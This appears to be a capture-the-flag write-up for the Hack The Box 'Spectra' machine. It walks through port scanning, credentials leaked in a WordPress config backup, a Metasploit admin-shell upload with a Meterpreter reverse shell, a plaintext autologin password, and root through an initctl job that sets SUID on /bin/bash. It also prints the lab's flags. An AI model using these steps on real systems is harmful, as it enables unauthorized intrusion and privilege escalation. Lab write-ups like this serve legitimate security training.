Hack-The-Box-walkthrough[Spectra]

Posted on 2021-03-01 Edited on 2021-06-27 In HackTheBox walkthrough Views: Word count in article: 866 Reading time ≈ 3 mins.

introduce

OS: Other
Difficulty: Easy
Points: 20
Release: 27 Feb 2021
IP: 10.10.10.229

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/spectra]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.229
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 (protocol 2.0)
80/tcp   open  http    nginx 1.17.4
3306/tcp open  mysql   MySQL (unauthorized)

doing a simple gobuster scan it reveals two directory /main and /testing

On the port 80 there is a live webserver just exposing to /testing directory we get some config files, in the wp-config.php.save file we get the username and password of the database we can use it to login on the wordpress webserver

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

get user

use administrator/devteam01 to login

After logging-in come across the Dashboard where we can install external plugin, so from here we can upload the plugin manually and get shell but that takes to time lets use another method using msf..

msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   devteam01        yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     spectra.htb      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /main/           yes       The base path to the wordpress application
   USERNAME   administrator    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.22      yes       The listen address (an interface may be specified)
   LPORT  4455             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress

now we get a shell,After getting shell cat out the /opt/autologin.conf.orig file which points out a passwd file in /etc/autologin folder which simply contains the password of katie user

meterpreter > cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter

meterpreter > pwd
/etc/autologin
meterpreter > ls
Listing: /etc/autologin
=======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  19    fil   2021-02-03 19:43:24 -0500  passwd

meterpreter > cat passwd
SummerHereWeCome!!
meterpreter > ls /home
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40700/rwx------  4096  dir   2020-07-20 05:53:17 -0400  .shadow
40755/rwxr-xr-x  4096  dir   2021-02-27 14:16:50 -0500  chronos
40755/rwxr-xr-x  4096  dir   2021-02-28 15:30:54 -0500  katie
40755/rwxr-xr-x  4096  dir   2021-02-28 14:47:17 -0500  nginx
41751/rwxr-x--x  4096  dir   2020-07-20 05:53:17 -0400  root
40755/rwxr-xr-x  4096  dir   2020-07-20 05:53:17 -0400  user

┌──(root💀kali)-[~/hackthebox/machine/spectra]
└─# ssh katie@spectra.htb
The authenticity of host 'spectra.htb (10.10.10.229)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'spectra.htb,10.10.10.229' (RSA) to the list of known hosts.
Password: 
katie@spectra ~ $ id
uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
katie@spectra ~ $ whoami
katie
katie@spectra ~ $ ls
log  user.txt
katie@spectra ~ $ cat user.txt
e89d27fe195e9114ffa72ba8913a6130

and we got the flag.

get root

After doing sudo -l we come to know that we can run the /sbin/initctl command now if you don’t know what /initctl command does read this:

initctl - init daemon control tool

Now edit the /etc/init/test.conf and add this lines

script

    chmod +s /bin/bash

end script

Now start the job as

1 2	katie@spectra /etc/init $ sudo /sbin/initctl start test test start/running, process 48988

and then try

katie@spectra ~ $ /bin/bash -p
bash-4.3# id
uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
main  nodetest.js  root.txt  script.sh  startup  test.conf
bash-4.3# cat root.txt
d44519713b889d5e1f9e536d0c6df2fc